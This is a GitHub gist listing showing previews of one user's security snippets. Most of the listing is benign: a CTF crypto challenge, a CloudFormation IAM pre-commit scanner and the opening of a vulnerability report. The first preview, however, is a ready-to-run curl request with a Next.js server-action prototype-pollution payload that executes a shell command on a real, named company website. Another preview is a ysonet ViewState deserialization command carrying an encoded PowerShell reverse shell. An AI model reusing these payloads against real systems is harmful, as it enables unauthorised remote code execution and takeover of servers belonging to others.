Skip to content

Instantly share code, notes, and snippets.

View RajChowdhury240's full-sized avatar
💻
just another learner

Raj Chowdhury RajChowdhury240

💻
just another learner
342 followers · 402 following
  • Confidential
  • $ aws sts get-caller-identity
  • 10:46 (UTC +11:00)
View GitHub Profile
@RajChowdhury240
RajChowdhury240 / d.md
Created December 5, 2025 16:44
image 
curl --path-as-is -i -s -k -X $'POST' \
    -H $'Host: www.redbullmobile.om' -H $'Next-Action: x' -H $'Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad' -H $'Content-Length: 740' \
    --data-binary $'------WebKitFormBoundaryx8jO2oVc6SWP3Sad\x0d\x0aContent-Disposition: form-data; name=\"0\"\x0d\x0a\x0d\x0a{\x0d\x0a  \"then\": \"$1:__proto__:then\",\x0d\x0a  \"status\": \"resolved_model\",\x0d\x0a  \"reason\": -1,\x0d\x0a  \"value\": \"{\\\"then\\\":\\\"$B1337\\\"}\",\x0d\x0a  \"_response\": {\x0d\x0a    \"_prefix\": \"var res=process.mainModule.require(\'child_process\').execSync(\'id\',{\'timeout\':5000}).toString().trim();;throw Object.assign(new Error(\'NEXT_REDIRECT\'), {digest:`${res}`});\",\x0d\x0a    \"_chunks\": \"$Q2\",\x0d\x0a    \"_formData\": {\x0d\x0a      \"get\": \"$1:constructor:constructor\"\x0d\x0a    }\x0d\x0a
@RajChowdhury240
RajChowdhury240 / d.txt
Created December 3, 2025 07:32
Cipher Chronicles: The Leaky Dispatch
200
AF2025
0 0
One of our agents sent us this dispatch, but we fear it was intercepted and tampered with. We know it's been encoded to look like nonsense and then encrypted. Our agent's field manual mentions a “Primary” protocol they always use to generate the key. We need you to decrypt the message and recover the flag. We have obtained intelligence indicating that the target is employing double encryption.
Dispatch File: UkJtaG9wdGlob1ZHOFlsOFVpMWlJVmcwMTVLd2ViTzBQcm1mS0FFUA==
@RajChowdhury240
RajChowdhury240 / demo.md
Created December 1, 2025 09:33
@RajChowdhury240
RajChowdhury240 / damn.txt
Created November 28, 2025 01:10
https://builder.aws.com/content/361Z26nfmss45Xnr49sdbSOEiLj/stop-using-aws-configure-just-use-aws-login
@RajChowdhury240
RajChowdhury240 / ba.md
Created November 26, 2025 17:07
image
@RajChowdhury240
RajChowdhury240 / den.txt
Created November 26, 2025 14:22
\ysonet.exe -p ViewState -g TextFormattingRunProperties -c "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMwAwAC4AOAA4ACIALAAxADMAMwA3ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAH
@RajChowdhury240
RajChowdhury240 / rule.py
Created November 25, 2025 13:52
#!/usr/bin/env python3
"""
Pre-commit hook to scan CloudFormation templates for insecure IAM configurations.
Checks for specific IAM actions with Resource "*" without any conditions.
"""
import json
import yaml
import sys
import os
@RajChowdhury240
RajChowdhury240 / demo.md
Created November 24, 2025 15:10
image image image image
@RajChowdhury240
RajChowdhury240 / file.txt
Created November 24, 2025 12:08
https://labs.cyberwarfare.live/credential/achievement/69244a9e4ae648396167fa50
@RajChowdhury240
RajChowdhury240 / FPDF-Scan.md
Created November 23, 2025 16:56

Security Vulnerability Report - FPDF Directory

Date: Generated on scan
Severity Levels: Critical, High, Medium, Low

Executive Summary

This directory contains multiple web vulnerabilities, with the most critical being in index.php which appears to be an intentionally vulnerable CTF (Capture The Flag) demonstration file. The FPDF library itself (fpdf.php) also contains a potential Local File Inclusion vulnerability in the _loadfont method.